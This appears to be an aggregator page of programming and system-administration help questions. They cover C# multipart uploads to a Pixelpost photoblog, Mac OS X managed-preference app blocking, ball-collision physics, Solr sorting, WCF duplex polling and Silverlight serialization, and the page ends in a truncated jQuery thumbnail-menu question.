Hi, guys, first of all thanks for your contributions; I've found great responses here. Yet I've run into a problem I can't figure out, and if someone could provide any help, it would be greatly appreciated. I'm developing an application in C# that can upload an image from a computer to a user's photoblog. For this I'm using the pixelpost platform for photoblogs, which is written mainly in PHP. I've searched here and on other web pages, but the examples provided there didn't work for me. Here is what I used in my example: (http://stackoverflow.com/questions/566462/upload-files-with-httpwebrequest-multipart-form-data) and (http://bytes.com/topic/c-sharp/answers/268661-how-upload-file-via-c-code). Once it is ready I will make it available for free on the internet and maybe also create a Windows Mobile version of it, since I'm a fan of pixelpost. Here is the code I've used:

    string formUrl = "http://localhost/pixelpost/admin/index.php?x=login";
    string formParams = string.Format("user={0}&password={1}", "user-String", "password-String");
    string cookieHeader;
    HttpWebRequest req = (HttpWebRequest)HttpWebRequest.Create(formUrl);
    req.ContentType = "application/x-www-form-urlencoded";
    req.Method = "POST";
    req.AllowAutoRedirect = false;
    byte[] bytes = Encoding.ASCII.GetBytes(formParams);
    req.ContentLength = bytes.Length;
    using (Stream os = req.GetRequestStream())
    {
        os.Write(bytes, 0, bytes.Length);
    }
    HttpWebResponse resp = (HttpWebResponse)req.GetResponse();
    cookieHeader = resp.Headers["Set-Cookie"];
    string pageSource;
    using (StreamReader sr = new StreamReader(resp.GetResponseStream()))
    {
        pageSource = sr.ReadToEnd();
        Console.WriteLine();
    }

    string getUrl = "http://localhost/pixelpost/admin/index.php";
    HttpWebRequest getRequest = (HttpWebRequest)HttpWebRequest.Create(getUrl);
    getRequest.Headers.Add("Cookie", cookieHeader);
    HttpWebResponse getResponse = (HttpWebResponse)getRequest.GetResponse();
    using (StreamReader sr = new StreamReader(getResponse.GetResponseStream()))
    {
        pageSource = sr.ReadToEnd();
    }
    // end first part: login to admin panel

    long length = 0;
    string boundary = "----------------------------" + DateTime.Now.Ticks.ToString("x");
    HttpWebRequest httpWebRequest2 = (HttpWebRequest)WebRequest.Create("http://localhost/pixelpost/admin/index.php?x=save");
    httpWebRequest2.ContentType = "multipart/form-data; boundary=" + boundary;
    httpWebRequest2.Method = "POST";
    httpWebRequest2.AllowAutoRedirect = false;
    httpWebRequest2.KeepAlive = false;
    httpWebRequest2.Credentials = System.Net.CredentialCache.DefaultCredentials;
    httpWebRequest2.Headers.Add("Cookie", cookieHeader);
    Stream memStream = new System.IO.MemoryStream();
    byte[] boundarybytes = System.Text.Encoding.ASCII.GetBytes("\r\n--" + boundary + "\r\n");
    string formdataTemplate = "\r\n--" + boundary + "\r\nContent-Disposition: form-data; name=\"{0}\";\r\n\r\n{1}";
    string formitem = string.Format(formdataTemplate, "headline", "image-name");
    byte[] formitembytes = System.Text.Encoding.UTF8.GetBytes(formitem);
    memStream.Write(formitembytes, 0, formitembytes.Length);
    memStream.Write(boundarybytes, 0, boundarybytes.Length);
    string headerTemplate = "\r\nContent-Disposition: form-data; name=\"{0}\"; filename=\"{1}\"\r\nContent-Type: application/octet-stream\r\n\r\n";
    string header = string.Format(headerTemplate, "userfile", "path-to-the-local-file");
    byte[] headerbytes = System.Text.Encoding.UTF8.GetBytes(header);
    memStream.Write(headerbytes, 0, headerbytes.Length);
    FileStream fileStream = new FileStream("path-to-the-local-file", FileMode.Open, FileAccess.Read);
    byte[] buffer = new byte[1024];
    int bytesRead = 0;
    while ((bytesRead = fileStream.Read(buffer, 0, buffer.Length)) != 0)
    {
        memStream.Write(buffer, 0, bytesRead);
    }
    memStream.Write(boundarybytes, 0, boundarybytes.Length);
    fileStream.Close();
    httpWebRequest2.ContentLength = memStream.Length;
    Stream requestStream = httpWebRequest2.GetRequestStream();
    memStream.Position = 0;
    byte[] tempBuffer = new byte[memStream.Length];
    memStream.Read(tempBuffer, 0, tempBuffer.Length);
    memStream.Close();
    requestStream.Write(tempBuffer, 0, tempBuffer.Length);
    requestStream.Close();
    WebResponse webResponse2 = httpWebRequest2.GetResponse();
    Stream stream2 = webResponse2.GetResponseStream();
    StreamReader reader2 = new StreamReader(stream2);
    Console.WriteLine(reader2.ReadToEnd());
    webResponse2.Close();
    httpWebRequest2 = null;
    webResponse2 = null;

And also here is the PHP: (http://dl.dropbox.com/u/3149888/index.php) and (http://dl.dropbox.com/u/3149888/new_image.php). The mandatory fields are headline and userfile, so I can't figure out where the mistake is, as the format sent seems right. I'm guessing there is something wrong with the octet-stream sent to the form. Maybe it's a stupid mistake I wasn't able to trace; in any case, if you could help me that would mean a lot. Thanks,
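One detail worth flagging in the code above: a multipart/form-data body must be terminated by a closing boundary of the form --boundary-- (with trailing dashes), but the snippet only ever writes the normal --boundary separator after the file, which many servers (PHP included) treat as an incomplete final part. A hedged sketch of the missing trailer, reusing the boundary and memStream variables from the question:

```csharp
// The final boundary of a multipart body is "--<boundary>--"; without the
// trailing "--" the last part may be discarded by the receiving server.
byte[] trailerBytes = System.Text.Encoding.ASCII.GetBytes(
    "\r\n--" + boundary + "--\r\n");
memStream.Write(trailerBytes, 0, trailerBytes.Length);
```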

    Read the article

  • How can I resolve this one application coming up with an "You don't have permission to use the application" error?

    - by morgant
I've got a Mac OS X 10.6 Snow Leopard Server Open Directory Master with a user who's getting Mobility & Application managed preferences from a group (the only group they're a member of). The workstation is also running Mac OS X 10.6 Snow Leopard. When the user logs in and tries to run our primary application, which they're explicitly allowed to run (via the group's preferences), it says "You don't have permission to use the application 'Blah'". Now, the application is added to the group's list of always allowed applications, unsigned (so a minor difference in application version or file contents shouldn't disallow it). It even lives in a subdirectory of /Applications, which is in the list of folders to allow applications. I've run into this when logging this user into new workstations, and the following usually works:

1. Log them out.
2. Remove the following files from their mobile home folder on the workstation: /Library/Managed\ Preferences/, ~/.FileSync, ~/Library/Preferences/com.apple.finder.plist, and ~/Library/Preferences/com.apple.MCX.plist.
3. Remove the following files from their network home folder on the server: ~/.FileSync, ~/Library/Preferences/com.apple.finder.plist, and ~/Library/Preferences/com.apple.MCX.plist.
4. Log them back in on the workstation.

However, this no longer resolves the issue. Their Home Sync preferences are set (on the group) to sync ~, but not the following files (manually, at login, and at logout... no background sync here):

    ~/.SymAVQSFile
    ~/NAVMac800QSFile
    ~/Library
    ~/.FileSync
    ~/.account

Their Preferences Sync preferences are set (also on the group) to sync ~/Library & ~/Documents/Microsoft User Data, but not the following files (also manually, at login, and at logout... no background sync):

    ~/.SymAVQSFile
    ~/.Trash
    ~/.Trashes
    ~/Documents/Microsoft User Data/Entourage Temp
    ~/Library/Application Support/SyncServices
    ~/Library/Application Support/MobileSync
    ~/Library/Caches
    ~/Library/Calendars/Calendar Cache
    ~/Library/Logs
    ~/Library/Mail/AvailableFeeds
    ~/Library/Mail/Envelope Index
    ~/Library/Preferences/Macromedia/
    ~/Library/Printers
    ~/Library/PubSub/Database
    ~/Library/PubSub/Downloads
    ~/Library/PubSub/Feeds
    ~/Library/Safari/Icons.db
    ~/Library/Safari/HistoryIndex.sk
    ~/Library/iTunes/iPhone Software Updates
    IMAP-*
    Exchange-*
    EWS-*
    Mac-*
    ~/Library/Preferences/ByHost
    ~/Library/Preferences/com.apple.dock.plist
    ~/Library/Preferences/com.apple.sitebarlists.plist
    ~/Library/Application Support/4D
    ~/Library/Preferences/com.apple.MCX.plist
    ~/.FileSync
    ~/.account

Even with ~/Library/Preferences/com.apple.MCX.plist prevented from syncing during a Preferences Sync, it still seems to show up in the network home on the server frequently. Are there any other files, other than ~/Library/Preferences/com.apple.MCX.plist, that contain application Managed Preferences that might be causing this one app to show up as not allowed? Any ideas on how ~/Library/Preferences/com.apple.MCX.plist keeps getting sync'd back up to the network home folder on the server?

Update: I thought I had found a workaround this morning, but it also seemed to be extremely temporary. Basically, looking at /Library/Managed\ Preferences/[shortname]/com.apple.applicationaccess.new.plist I discovered that it didn't have an entry for the application in question, but /Library/Managed\ Preferences/[shortname]/complete.plist did. Naturally, I deleted com.apple.applicationaccess.new.plist, logged in again, and it worked... on one workstation. It failed on others, and after logging out & back in a couple more times it started failing on all of them again, even after further deletions of com.apple.applicationaccess.new.plist. Oddly, com.apple.applicationaccess.new.plist & complete.plist do both contain an entry for the application in question now, but it still says it's not allowed.

Further Update: Okay, so I now have a reproducible workaround which seems to be required after every reboot of the workstation:

1. Log in as the user (you'll discover you cannot launch the application in question).
2. Fast User Switch to the local admin account on the workstation (we always have one on every machine).
3. From that local admin account, run sudo mcxrefresh -n 'shortname' (logging out and back in as the user in question will not work).
4. Fast User Switch back to the user (you'll still not be allowed to run the application).
5. Log the user out and back in (you'll now be able to run the application in question).
6. Fast User Switch back to the local admin account, log it out, and log back in as the user in question.

If you do all that exactly as described, it'll keep working through log out & log back in, but NOT through a reboot. If, after a reboot, you try something like logging in as the local admin account, running sudo mcxrefresh -n 'shortname', logging out, then logging in as the user in question, it will NOT work.

Yet Another Update: We don't have any computer groups in our Open Directory, so it shouldn't be getting any conflicting settings from there. I ran sudo mcxquery -format xml -user shortname -group groupname before & after performing the aforementioned process to allow the application in question to be run, and the results were identical (saved the results to files & diff'd... I'm not just guessing here).

One Step Forward, Half a Step Back: When the Mac OS X 10.6.5 Server update was released, we upgraded our Open Directory Master to it, as the changes included the following managed preferences fixes which I hoped might address this issue:

- Addresses an issue that could prevent managed preferences from being applied when a user logs in on a workstation that has been idle.
- Fixes an issue that could prevent administrators from bypassing client management settings on a workstation.

This seemed to improve the situation slightly. The application in question now usually launches without error. If and when it does launch with the "You don't have permission to use the application" error, logging the user out and back in seems to correct it. That said, we've since had to add a couple of applications to the user's ~/Applications/ directory, and those are still prevented from launching. The workstations are running Mac OS X 10.6.4, the OD Master (which the workstations are bound to) is running Mac OS X 10.6.5 Server (although there are two OD Replicas still running 10.6.4 Server), and we're using Workgroup Manager 10.6.3 (which is included with the Server Admin Tools 10.6.5 upgrade) to add the applications (unsigned, as always). This time, I've caught the following in /var/log/system.log when attempting to launch one of the allowed applications from ~/Applications:

    Dec 22 17:36:24 hostname parentalcontrolsd[43221]: -[ActivityTracker checkApp:csFlags:] [954:username] -- *** Incoming app appears to be masquerading as white listed app and failed signature validation: /Users/username/Applications/FileMaker Pro 5.5/FileMaker Pro.app/Contents/MacOS/FileMaker Pro. Note: This may be a valid app of a different version than what was whitelisted (on a different volume?)
    Dec 22 17:36:24 hostname [0x0-0xa42a42].com.filemaker.filemakerpro[43304]: launch of /Users/username/Applications/FileMaker Pro 5.5/FileMaker Pro.app/Contents/MacOS/FileMaker Pro was blocked
    Dec 22 17:36:24 hostname com.apple.launchd.peruser.1340[6375] ([0x0-0xa42a42].com.filemaker.filemakerpro[43304]): Exited with exit code: 255
    Dec 22 17:36:24 hostname parentalcontrolsd[43221]: -[ActivityTracker(Private) _removeAppFromWhiteList:] [1362:username] -- *** Couldn't find local user record

Running sudo mcxquery -format xml -user username -group groupname includes the following entry for FileMaker Pro 5.5 (and appears to include a full integration of the user's application whitelist & the group's application whitelist):

    <dict>
        <key>bundleID</key>
        <string>com.filemaker.filemakerpro</string>
        <key>displayName</key>
        <string>FileMaker Pro</string>
    </dict>

Note the lack of <key>appID</key><data> ... </data>, which seems to specify a signed application. While whitelisted directories also appear to be correctly listed in the results, they too do not actually allow the applications to be run. What is going on here?! Where else should I be looking?

    Read the article

  • Mass Ball-to-Ball Collision Handling (as in, lots of balls)

    - by BlueThen
Update: Found out that I was using the radius as the diameter, which was why the mtd was overcompensating.

Hi, StackOverflow. I wrote a Processing program a while back simulating ball physics. Basically, I have a large number of balls (1000), with gravity turned on. Detection works great, but my issue is that they start acting weird when they're bouncing against other balls in all directions. I'm pretty confident this involves the handling. For the most part, I'm using Jay Conrod's code. One part that's different is

    if (distance > 1.0) return;

which I've changed to

    if (distance < 1.0) return;

because the collision wasn't even being performed with the first bit of code; I'm guessing that's a typo. The balls overlap when I use his code, which isn't what I was looking for. My attempt to fix it was to move the balls to the edge of each other:

    float angle = atan2(y - collider.y, x - collider.x);
    float distance = dist(x, y, balls[ID2].x, balls[ID2].y);
    x = collider.x + radius * cos(angle);
    y = collider.y + radius * sin(angle);

This isn't correct, I'm pretty sure of that. I tried the correction algorithm in the previous ball-to-ball topic:

    // get the mtd
    Vector2d delta = (position.subtract(ball.position));
    float d = delta.getLength();
    // minimum translation distance to push balls apart after intersecting
    Vector2d mtd = delta.multiply(((getRadius() + ball.getRadius()) - d) / d);
    // resolve intersection --
    // inverse mass quantities
    float im1 = 1 / getMass();
    float im2 = 1 / ball.getMass();
    // push-pull them apart based off their mass
    position = position.add(mtd.multiply(im1 / (im1 + im2)));
    ball.position = ball.position.subtract(mtd.multiply(im2 / (im1 + im2)));

except my version doesn't use vectors, and every ball's weight is 1. The resulting code I get is this:

    PVector delta = new PVector(collider.x - x, collider.y - y);
    float d = delta.mag();
    PVector mtd = new PVector(delta.x * ((radius + collider.radius - d) / d), delta.y * ((radius + collider.radius - d) / d));
    // push-pull apart based on mass
    x -= mtd.x * 0.5;
    y -= mtd.y * 0.5;
    collider.x += mtd.x * 0.5;
    collider.y += mtd.y * 0.5;

This code seems to over-correct collisions, which doesn't make sense to me, because in no other way do I modify the x and y values of each ball other than this. Some other part of my code could be wrong, but I don't know.
Here's the snippet of the entire ball-to-ball collision handling I'm using:

    if (alreadyCollided.contains(new Integer(ID2)))
        // if the ball has already collided with this, then we don't need to reperform the collision algorithm
        return;
    Ball collider = (Ball) objects.get(ID2);
    PVector collision = new PVector(x - collider.x, y - collider.y);
    float distance = collision.mag();
    if (distance == 0) {
        collision = new PVector(1, 0);
        distance = 1;
    }
    if (distance < 1) return;
    PVector velocity = new PVector(vx, vy);
    PVector velocity2 = new PVector(collider.vx, collider.vy);
    collision.div(distance); // normalize the distance
    float aci = velocity.dot(collision);
    float bci = velocity2.dot(collision);
    float acf = bci;
    float bcf = aci;
    vx += (acf - aci) * collision.x;
    vy += (acf - aci) * collision.y;
    collider.vx += (bcf - bci) * collision.x;
    collider.vy += (bcf - bci) * collision.y;
    alreadyCollided.add(new Integer(ID2));
    collider.alreadyCollided.add(new Integer(ID));
    PVector delta = new PVector(collider.x - x, collider.y - y);
    float d = delta.mag();
    PVector mtd = new PVector(delta.x * ((radius + collider.radius - d) / d), delta.y * ((radius + collider.radius - d) / d));
    // push-pull apart based on mass
    x -= mtd.x * 0.2;
    y -= mtd.y * 0.2;
    collider.x += mtd.x * 0.2;
    collider.y += mtd.y * 0.2;

Thanks. (Apologies for lack of sources, stackoverflow thinks I'm a spammer)
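Given the update at the top of this entry (the radius was being used as if it were the diameter), a sketch of the positional correction with the combined radii spelled out follows; the variable names mirror the snippet above, and the equal 0.5/0.5 split assumes equal masses:

```java
// Processing-style sketch: separate two overlapping balls along the line
// between their centers. The overlap is measured against the SUM of the
// radii; treating one radius as the diameter over-corrects.
PVector delta = new PVector(collider.x - x, collider.y - y);
float d = delta.mag();
float overlap = (radius + collider.radius) - d; // > 0 only when intersecting
if (overlap > 0 && d > 0) {
  float nx = delta.x / d; // unit vector toward the collider
  float ny = delta.y / d;
  // equal masses: each ball moves half the overlap
  x -= nx * overlap * 0.5f;
  y -= ny * overlap * 0.5f;
  collider.x += nx * overlap * 0.5f;
  collider.y += ny * overlap * 0.5f;
}
```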

    Read the article

  • Why won't this sort in Solr work?

    - by Camran
I need to sort on a date field whose name is "mod_date". It works like this in the browser address bar:

    http://localhost:8983/solr/select/?&q=bmw&sort=mod_date+desc

But I am using a phpSolr client which sends a URL to Solr, and the URL sent is this:

    fq=+category%3A%22Bilar%22+%2B+car_action%3AS%C3%A4ljes&version=1.2&wt=json&json.nl=map&q=%2A%3A%2A&start=0&rows=5&sort=mod_date+desc // This won't work

It is echoed after this in PHP:

    $queryString = http_build_query($params, null, $this->_queryStringDelimiter);
    $queryString = preg_replace('/%5B(?:[0-9]|[1-9][0-9]+)%5D=/', '=', $queryString);

This won't work, and I don't know why! Everything else works fine; all the right fields are returned. But the sort doesn't work. Any ideas? Thanks.

BTW: The field "mod_date" contains something like: 2010-03-04T19:37:22.5Z

EDIT: First I use PHP to send this to a SolrPhpClient, which is another PHP file called service.php:

    require_once('../SolrPhpClient/Apache/Solr/Service.php');
    $solr = new Apache_Solr_Service('localhost', 8983, '/solr/');
    $results = $solr->search($querystring, $p, $limit, $solr_params);

$solr_params is an array which contains the Solr parameters (q, fq, etc). Now, in service.php:

    $params['version'] = self::SOLR_VERSION;
    // common parameters in this interface
    $params['wt'] = self::SOLR_WRITER;
    $params['json.nl'] = $this->_namedListTreatment;
    $params['q'] = $query;
    $params['sort'] = 'mod_date desc'; // HERE IS THE SORT I HAVE PROBLEM WITH
    $params['start'] = $offset;
    $params['rows'] = $limit;
    $queryString = http_build_query($params, null, $this->_queryStringDelimiter);
    $queryString = preg_replace('/%5B(?:[0-9]|[1-9][0-9]+)%5D=/', '=', $queryString);
    if ($method == self::METHOD_GET) {
        return $this->_sendRawGet($this->_searchUrl . $this->_queryDelimiter . $queryString);
    } else if ($method == self::METHOD_POST) {
        return $this->_sendRawPost($this->_searchUrl, $queryString, FALSE, 'application/x-www-form-urlencoded');
    }

The $results contain the results from Solr... So this is the way I need to get it to work (via PHP). The line below (also at the top of this question) works, but that's because I paste it into the address bar manually, not via the PHPclient. That's just for debugging; I need to get it to work via the PHPclient:

    http://localhost:8983/solr/select/?&q=bmw&sort=mod_date+desc // Not via phpclient, but works

UPDATE (2010-03-08): I have tried Donovan's codes (the URLs) and they work fine. Now, I have noticed that it is one of the parameters causing the 'SORT' not to work. This parameter is the "wt" parameter. If we take the URL from the top of this question and simply remove the "wt" parameter, then the sort works. BUT the results appear differently, thus making my PHP code unable to recognize the results, I believe. Donovan would know this, I think. I am guessing that in order for the PHPClient to work, the results must be in a specific structure, which gets messed up as soon as I remove the wt parameter. Donovan, help me please... Here is some background on what I use your SolrPhpClient for: I have a classifieds website which uses MySQL, but for the searching I am using Solr to search some indexed fields. Solr returns an array of ID numbers for all matches of the search criteria. Then I use those ID numbers to find everything in the MySQL db and fetch all other information (for example, non-searchable information). So, simplified: search - Solr returns all matches in an array of ID numbers - the ID numbers from Solr are the same as the ID numbers in the MySQL db, so I can just make a simple match against every record with the ID matching the ID from the Solr results array. I don't use faceting, no boosting, no relevancy or other fancy stuff. I only sort by the latest classified put up, and give users the option to also sort on the cheapest price. Nothing more. Then I use the "fq" parameter to do queries on different fields in Solr depending on the category chosen by users (for example "cars", which in my language is "Bilar"). I am really stuck with this problem here... Thanks for all help.
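For reference, with the Apache_Solr_Service client shown above, a sort can normally be passed through the optional fourth argument of search() instead of being hard-coded in service.php; the client then serializes it with http_build_query exactly as in the quoted code. A minimal sketch (the fq value is illustrative):

```php
<?php
require_once('../SolrPhpClient/Apache/Solr/Service.php');

$solr = new Apache_Solr_Service('localhost', 8983, '/solr/');

// search($query, $offset, $limit, $params): 'sort' rides along in $params
// and ends up in the query string next to wt/json.nl.
$params = array(
    'fq'   => 'category:"Bilar"',
    'sort' => 'mod_date desc',
);
$results = $solr->search('bmw', 0, 5, $params);
?>
```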

    Read the article

  • deadlock when using WCF Duplex Polling with Silverlight

    - by Kobi Hari
Hi all. I have followed Tomek Janczuk's demonstration on Silverlight TV to create a chat program that uses a WCF duplex polling web service. The client subscribes to the server, and then the server initiates notifications to all connected clients to publish events. The idea is simple: on the client, there is a button that allows the client to connect, a text box where the client can write a message and publish it, and a bigger text box that presents all the notifications received from the server. I connected 3 clients (in different browsers - IE, Firefox and Chrome) and it all works nicely. They send messages and receive them smoothly. The problem starts when I close one of the browsers. As soon as one client is out, the other clients get stuck: they stop getting notifications. I am guessing that the loop in the server that goes through all the clients and sends them the notifications is stuck on the client that is now missing. I tried catching the exception and removing it from the clients list (see code), but it still does not help. Any ideas? The server code is as follows:

    using System;
    using System.Linq;
    using System.Runtime.Serialization;
    using System.ServiceModel;
    using System.ServiceModel.Activation;
    using System.Collections.Generic;
    using System.Runtime.Remoting.Channels;

    namespace ChatDemo.Web
    {
        [ServiceContract]
        public interface IChatNotification
        {
            // this will be used as a callback method, therefore it must be one way
            [OperationContract(IsOneWay = true)]
            void Notify(string message);

            [OperationContract(IsOneWay = true)]
            void Subscribed();
        }

        // define this as a callback contract - to allow push
        [ServiceContract(Namespace = "", CallbackContract = typeof(IChatNotification))]
        [AspNetCompatibilityRequirements(RequirementsMode = AspNetCompatibilityRequirementsMode.Allowed)]
        [ServiceBehavior(InstanceContextMode = InstanceContextMode.Single)]
        public class ChatService
        {
            SynchronizedCollection<IChatNotification> clients = new SynchronizedCollection<IChatNotification>();

            [OperationContract(IsOneWay = true)]
            public void Subscribe()
            {
                IChatNotification cli = OperationContext.Current.GetCallbackChannel<IChatNotification>();
                this.clients.Add(cli);
                // inform the client it is now subscribed
                cli.Subscribed();
                Publish("New Client Connected: " + cli.GetHashCode());
            }

            [OperationContract(IsOneWay = true)]
            public void Publish(string message)
            {
                SynchronizedCollection<IChatNotification> toRemove = new SynchronizedCollection<IChatNotification>();
                foreach (IChatNotification channel in this.clients)
                {
                    try
                    {
                        channel.Notify(message);
                    }
                    catch
                    {
                        toRemove.Add(channel);
                    }
                }
                // now remove all the dead channels
                foreach (IChatNotification chnl in toRemove)
                {
                    this.clients.Remove(chnl);
                }
            }
        }
    }

The client code is as follows:

    void client_NotifyReceived(object sender, ChatServiceProxy.NotifyReceivedEventArgs e)
    {
        this.Messages.Text += string.Format("{0}\n\n", e.Error != null ? e.Error.ToString() : e.message);
    }

    private void MyMessage_KeyDown(object sender, KeyEventArgs e)
    {
        if (e.Key == Key.Enter)
        {
            this.client.PublishAsync(this.MyMessage.Text);
            this.MyMessage.Text = "";
        }
    }

    private void Button_Click(object sender, RoutedEventArgs e)
    {
        this.client = new ChatServiceProxy.ChatServiceClient(
            new PollingDuplexHttpBinding { DuplexMode = PollingDuplexMode.MultipleMessagesPerPoll },
            new EndpointAddress("../ChatService.svc"));
        // listen for server events
        this.client.NotifyReceived += new EventHandler<ChatServiceProxy.NotifyReceivedEventArgs>(client_NotifyReceived);
        this.client.SubscribedReceived += new EventHandler<System.ComponentModel.AsyncCompletedEventArgs>(client_SubscribedReceived);
        // subscribe for the server events
        this.client.SubscribeAsync();
    }

    void client_SubscribedReceived(object sender, System.ComponentModel.AsyncCompletedEventArgs e)
    {
        try
        {
            Messages.Text += "Connected!\n\n";
            gsConnect.Color = Colors.Green;
        }
        catch
        {
            Messages.Text += "Failed to Connect!\n\n";
        }
    }

And the web config is as follows:

    <system.serviceModel>
      <extensions>
        <bindingExtensions>
          <add name="pollingDuplex" type="System.ServiceModel.Configuration.PollingDuplexHttpBindingCollectionElement, System.ServiceModel.PollingDuplex, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"/>
        </bindingExtensions>
      </extensions>
      <behaviors>
        <serviceBehaviors>
          <behavior name="">
            <serviceMetadata httpGetEnabled="true"/>
            <serviceDebug includeExceptionDetailInFaults="false"/>
          </behavior>
        </serviceBehaviors>
      </behaviors>
      <bindings>
        <pollingDuplex>
          <binding name="myPollingDuplex" duplexMode="MultipleMessagesPerPoll"/>
        </pollingDuplex>
      </bindings>
      <serviceHostingEnvironment aspNetCompatibilityEnabled="true" multipleSiteBindingsEnabled="true"/>
      <services>
        <service name="ChatDemo.Web.ChatService">
          <endpoint address="" binding="pollingDuplex" bindingConfiguration="myPollingDuplex" contract="ChatDemo.Web.ChatService"/>
          <endpoint address="mex" binding="mexHttpBinding" contract="IMetadataExchange"/>
        </service>
      </services>
    </system.serviceModel>
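A hedged guess at the stall described above: even though Notify is marked IsOneWay, the call can still block while the transport to a vanished client waits for a timeout, which freezes the foreach loop in Publish for everyone. Checking the callback channel's state before calling is one common mitigation, not a guaranteed fix; a sketch reusing the names from the service code (the cast works because WCF callback channels implement ICommunicationObject):

```csharp
// Sketch: skip channels that are no longer open so a dead client
// cannot stall the publish loop until its send times out.
foreach (IChatNotification channel in this.clients)
{
    var comm = channel as System.ServiceModel.ICommunicationObject;
    if (comm != null && comm.State != System.ServiceModel.CommunicationState.Opened)
    {
        toRemove.Add(channel); // drop closed/faulted channels
        continue;
    }
    try { channel.Notify(message); }
    catch { toRemove.Add(channel); }
}
```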

    Read the article

  • Silverlight/Web Service Serializing Interface for use Client Side

    - by Steve Brouillard
I have a Silverlight solution that references a third-party web service. This web service generates XML, which is then processed into objects for use in Silverlight binding. At one point the processing of XML to objects was done client-side, but we ran into performance issues and decided to move this processing to the proxies in the hosting web project to improve performance (which it did). This is obviously a gross over-simplification, but it should work. My basic project structure looks like this:

    Solution
    Solution.Web - Holds the web page that hosts Silverlight, as well as proxies that access web services and process as required (and obviously the references to those web services).
    Solution.Infrastructure - Holds references to the proxy web services in the Web project, all genned code from serialized objects from those proxies, and code around those objects that needs to be client-side.
    Solution.Book - The particular project that uses the objects in question after they are processed down into Infrastructure.

I've defined the following interface and class in the Web project. They represent the type of objects that the XML from the original third party gets transformed into, and since this is the only project in the Silverlight app that is actually server-side, that was the place to define and use them.

    // Doesn't get much simpler than this.
    public interface INavigable
    {
        string Description { get; set; }
    }

    // Very simple class too
    public class IndexEntry : INavigable
    {
        public List<IndexCM> CMItems { get; set; }
        public string CPTCode { get; set; }
        public string DefinitionOfAbbreviations { get; set; }
        public string Description { get; set; }
        public string EtiologyCode { get; set; }
        public bool HighScore { get; set; }
        public IndexToTabularCommandArguments IndexToTabularCommandArgument { get; set; }
        public bool IsExpanded { get; set; }
        public string ManifestationCode { get; set; }
        public string MorphologyCode { get; set; }
        public List<TextItem> NonEssentialModifiersAndQualifyingText { get; set; }
        public string OtherItalics { get; set; }
        public IndexEntry Parent { get; set; }
        public int Score { get; set; }
        public string SeeAlsoReference { get; set; }
        public string SeeReference { get; set; }
        public List<IndexEntry> SubEntries { get; set; }
        public int Words { get; set; }
    }

Again, both of these items are defined in the Web project. Notice that IndexEntry implements INavigable. When the code for IndexEntry is auto-genned in the Infrastructure project, the definition of the class does not include the implementation of INavigable. After discovering this, I thought "no problem, I'll create another partial class file reiterating the implementation". Unfortunately (I'm guessing because it isn't being serialized), that interface isn't recognized in the Infrastructure project, so I can't simply do that. Here's where it gets really weird: the BOOK project CAN see the INavigable interface. In fact I use it in Book, though Book has no reference to the web service in the Web project where the thing is defined, though Infrastructure does. Just as a test, I linked to the INavigable source file from inside the Infrastructure project. That allowed me to reference it in that project and compile, but it causes havoc in the Book project, because now there's a conflict between the one defined in Infrastructure and the one defined in the Web project's web service. This is behavior I would expect. So, to try and sum up a bit: the Web project has a web service that processes data from a third-party service and has a class and interface defined in it. The class implements the interface. The Infrastructure project references the web service in the Web project, and the Book project references the Infrastructure project. The implementation of the interface in the class does NOT serialize down, so the auto-genned code in Infrastructure does not show this relationship, breaking code further downstream. The Book project, which is further downstream, CAN see the interface as defined in the Web project, even though its only reference is through the Infrastructure project, which CAN'T see it. Am I simply missing something easy here? Can I apply an attribute to either the interface definition or to its implementation in the class to ensure its visibility downstream? Anything else I can do here? I know this is a bit convoluted, and for anyone still with me here, thanks for your patience and any advice you might have. Cheers, Steve
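Background that may explain the behavior described in this entry: service-reference code generation typically carries only data contract members across the wire, never interface implementations, and it emits the generated types as partial classes. The usual pattern is therefore to share the interface itself as a linked source file and re-attach it in a partial class in the consuming project; whether that resolves the Book-project conflict here is an assumption, since Book would then need to compile against the linked copy rather than the service-side one:

```csharp
// In Solution.Infrastructure, next to the generated proxy code.
// INavigable.cs is added as a linked file ("Add As Link") from the Web
// project so both projects compile against one definition.
public partial class IndexEntry : INavigable
{
    // Description is already generated from the data contract; this
    // partial declaration only re-attaches the interface.
}
```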

    Read the article

  • Trying to create scrolling horizontal thumbnail navigation that hides on left side when not in use

    - by user346602
Hi, I am trying to recreate the type of scrolling thumbnail navigation described in the following tutorial: http://tympanus.net/codrops/2010/05/10/scrollable-thumbs-menu/. I require my thumbs to slide out horizontally from the left. I have amended the code to the best of my abilities, but I can't get it to work. (I think the problem is in the top third of the jQuery.) Here is what I have to date:

HTML

    <ul class="menu" id="menu">
      <li>
        <a href="#"></a>
        <div class="sc_menu_wrapper">
          <div class="sc_menu">
            <a href="#"><img src="images/gallery/1.jpg" alt=""/></a>
            <a href="#"><img src="images/gallery/2.jpg" alt=""/></a>
            <a href="#"><img src="images/gallery/3.jpg" alt=""/></a>
            <a href="#"><img src="images/gallery/4.jpg" alt=""/></a>
            <a href="#"><img src="images/gallery/5.jpg" alt=""/></a>
          </div>
        </div>
      </li>
    </ul>

CSS

    /* Navigation Style */
    ul.menu {
      position: fixed;
      top: 0px;
      left: 0px;
      width: 100%;
    }
    ul.menu li {
      position: relative;
      width: 100%;
    }
    ul.menu li > a {
      position: absolute;
      top: 300px;
      left: 0px;
      width: 40px;
      height: 200px;
      background-color: #e7e7e8;
    }
    /* Thumb Scrolling Style */
    div.sc_menu_wrapper {
      position: absolute;
      right: 0px;
      height: 220px;
      overflow: hidden;
      top: 300px;
      left: 0px;
      visibility: hidden;
    }
    div.sc_menu {
      height: 200px;
      visibility: hidden;
    }
    .sc_menu a {
      display: block;
      background-color: #e7e7e8;
    }
    .sc_menu img {
      display: block;
      border: none;
      opacity: 0.3;
      filter: progid:DXImageTransform.Microsoft.Alpha(opacity=30);
    }

JQUERY

    $(function(){
      // function to make the thumbs menu scrollable
      function buildThumbs($elem){
        var $wrapper = $elem.next();
        var $menu = $wrapper.find('.sc_menu');
        var inactiveMargin = 220;
        // move the scroll down to the beginning (move as much as the height of the menu)
        $wrapper.scrollRight($menu.outerHeight());
        // when moving the mouse up or down, the wrapper moves (scrolls) up or down
        $wrapper.bind('mousemove', function(e){
          var wrapperWidth = $wrapper.width();
          var menuWidth = $menu.outerWidth() + 2 * inactiveMargin;
          var top = (e.pageX - $wrapper.offset().right) * (menuWidth - wrapperWidth) / wrapperWidth - inactiveMargin;
          $wrapper.scrollRight(right + 10);
        });
      }
      var stacktime;
      $('#menu li > a').bind('mouseover', function () {
        var $this = $(this);
        buildThumbs($this);
